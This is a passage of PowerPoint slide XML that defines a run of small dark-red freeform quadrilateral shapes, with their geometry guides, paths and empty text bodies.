                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="29" h="55">
                      <a:moveTo>
                        <a:pt x="29" y="30"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="30"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10886" name="Freeform 292"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2676" y="3486"/>
                  <a:ext cx="39" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 39"/>
                    <a:gd name="T1" fmla="*/ 43 h 71"/>
                    <a:gd name="T2" fmla="*/ 39 w 39"/>
                    <a:gd name="T3" fmla="*/ 71 h 71"/>
                    <a:gd name="T4" fmla="*/ 0 w 39"/>
                    <a:gd name="T5" fmla="*/ 30 h 71"/>
                    <a:gd name="T6" fmla="*/ 0 w 39"/>
                    <a:gd name="T7" fmla="*/ 0 h 71"/>
                    <a:gd name="T8" fmla="*/ 39 w 39"/>
                    <a:gd name="T9" fmla="*/ 43 h 71"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 39"/>
                    <a:gd name="T16" fmla="*/ 0 h 71"/>
                    <a:gd name="T17" fmla="*/ 39 w 39"/>
                    <a:gd name="T18" fmla="*/ 71 h 71"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="39" h="71">
                      <a:moveTo>
                        <a:pt x="39" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="39" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10887" name="Freeform 293"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2642" y="3451"/>
                  <a:ext cx="32" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 32"/>
                    <a:gd name="T1" fmla="*/ 34 h 64"/>
                    <a:gd name="T2" fmla="*/ 32 w 32"/>
                    <a:gd name="T3" fmla="*/ 64 h 64"/>
                    <a:gd name="T4" fmla="*/ 0 w 32"/>
                    <a:gd name="T5" fmla="*/ 29 h 64"/>
                    <a:gd name="T6" fmla="*/ 0 w 32"/>
                    <a:gd name="T7" fmla="*/ 0 h 64"/>
                    <a:gd name="T8" fmla="*/ 32 w 32"/>
                    <a:gd name="T9" fmla="*/ 34 h 64"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 32"/>
                    <a:gd name="T16" fmla="*/ 0 h 64"/>
                    <a:gd name="T17" fmla="*/ 32 w 32"/>
                    <a:gd name="T18" fmla="*/ 64 h 64"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="32" h="64">
                      <a:moveTo>
                        <a:pt x="32" y="34"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="34"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10888" name="Freeform 294"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2606" y="3415"/>
                  <a:ext cx="34" cy="62"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 34 h 62"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 62 h 62"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 26 h 62"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 62"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 34 h 62"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 62"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 62 h 62"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="62">
                      <a:moveTo>
                        <a:pt x="34" y="34"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="34"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10889" name="Freeform 295"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="2999"/>
                  <a:ext cx="30" cy="44"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 17 h 44"/>
                    <a:gd name="T2" fmla="*/ 30 w 30"/>
                    <a:gd name="T3" fmla="*/ 44 h 44"/>
                    <a:gd name="T4" fmla="*/ 0 w 30"/>
                    <a:gd name="T5" fmla="*/ 27 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 30"/>
                    <a:gd name="T7" fmla="*/ 0 h 44"/>
                    <a:gd name="T8" fmla="*/ 30 w 30"/>
                    <a:gd name="T9" fmla="*/ 17 h 44"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 30"/>
                    <a:gd name="T16" fmla="*/ 0 h 44"/>
                    <a:gd name="T17" fmla="*/ 30 w 30"/>
                    <a:gd name="T18" fmla="*/ 44 h 44"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="30" h="44">
                      <a:moveTo>
                        <a:pt x="30" y="17"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="30" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="17"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10890" name="Freeform 296"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2643" y="3037"/>
                  <a:ext cx="33" cy="50"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 33 w 33"/>
                    <a:gd name="T1" fmla="*/ 19 h 50"/>
                    <a:gd name="T2" fmla="*/ 33 w 33"/>
                    <a:gd name="T3" fmla="*/ 50 h 50"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 30 h 50"/>
                    <a:gd name="T6" fmla="*/ 0 w 33"/>
                    <a:gd name="T7" fmla="*/ 0 h 50"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 19 h 50"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 33"/>
                    <a:gd name="T16" fmla="*/ 0 h 50"/>
                    <a:gd name="T17" fmla="*/ 33 w 33"/>
                    <a:gd name="T18" fmla="*/ 50 h 50"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="33" h="50">
                      <a:moveTo>
                        <a:pt x="33" y="19"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="19"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10891" name="Freeform 297"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2607" y="3016"/>
                  <a:ext cx="34" cy="49"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 21 h 49"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 49 h 49"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 49"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 49"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 21 h 49"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 49"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 49 h 49"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="49">
                      <a:moveTo>
                        <a:pt x="34" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="21"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10892" name="Freeform 298"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3062"/>
                  <a:ext cx="30" cy="48"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 21 h 48"/>
                    <a:gd name="T2" fmla="*/ 30 w 30"/>
                    <a:gd name="T3" fmla="*/ 48 h 48"/>
                    <a:gd name="T4" fmla="*/ 0 w 30"/>
                    <a:gd name="T5" fmla="*/ 27 h 48"/>
                    <a:gd name="T6" fmla="*/ 0 w 30"/>
                    <a:gd name="T7" fmla="*/ 0 h 48"/>
                    <a:gd name="T8" fmla="*/ 30 w 30"/>
                    <a:gd name="T9" fmla="*/ 21 h 48"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 30"/>
                    <a:gd name="T16" fmla="*/ 0 h 48"/>
                    <a:gd name="T17" fmla="*/ 30 w 30"/>
                    <a:gd name="T18" fmla="*/ 48 h 48"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="30" h="48">
                      <a:moveTo>
                        <a:pt x="30" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="30" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="21"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10893" name="Freeform 299"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2677" y="3130"/>
                  <a:ext cx="39" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 39"/>
                    <a:gd name="T1" fmla="*/ 25 h 56"/>
                    <a:gd name="T2" fmla="*/ 39 w 39"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 39"/>
                    <a:gd name="T5" fmla="*/ 30 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 39"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 39 w 39"/>
                    <a:gd name="T9" fmla="*/ 25 h 56"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 39"/>
                    <a:gd name="T16" fmla="*/ 0 h 56"/>
                    <a:gd name="T17" fmla="*/ 39 w 39"/>
                    <a:gd name="T18" fmla="*/ 56 h 56"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="39" h="56">
                      <a:moveTo>
                        <a:pt x="39" y="25"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="39" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39" y="25"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10894" name="Freeform 300"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2643" y="3108"/>
                  <a:ext cx="33" cy="51"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 33 w 33"/>
                    <a:gd name="T1" fmla="*/ 21 h 51"/>
                    <a:gd name="T2" fmla="*/ 33 w 33"/>
                    <a:gd name="T3" fmla="*/ 51 h 51"/>
                    <a:gd name="T4" fmla="*/ 0 w 33"/>
                    <a:gd name="T5" fmla="*/ 29 h 51"/>
                    <a:gd name="T6" fmla="*/ 0 w 33"/>
                    <a:gd name="T7" fmla="*/ 0 h 51"/>
                    <a:gd name="T8" fmla="*/ 33 w 33"/>
                    <a:gd name="T9" fmla="*/ 21 h 51"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 33"/>
                    <a:gd name="T16" fmla="*/ 0 h 51"/>
                    <a:gd name="T17" fmla="*/ 33 w 33"/>
                    <a:gd name="T18" fmla="*/ 51 h 51"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="33" h="51">
                      <a:moveTo>
                        <a:pt x="33" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="51"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="21"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10895" name="Freeform 301"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2607" y="3084"/>
                  <a:ext cx="34" cy="50"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 22 h 50"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 50 h 50"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 27 h 50"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 50"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 22 h 50"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
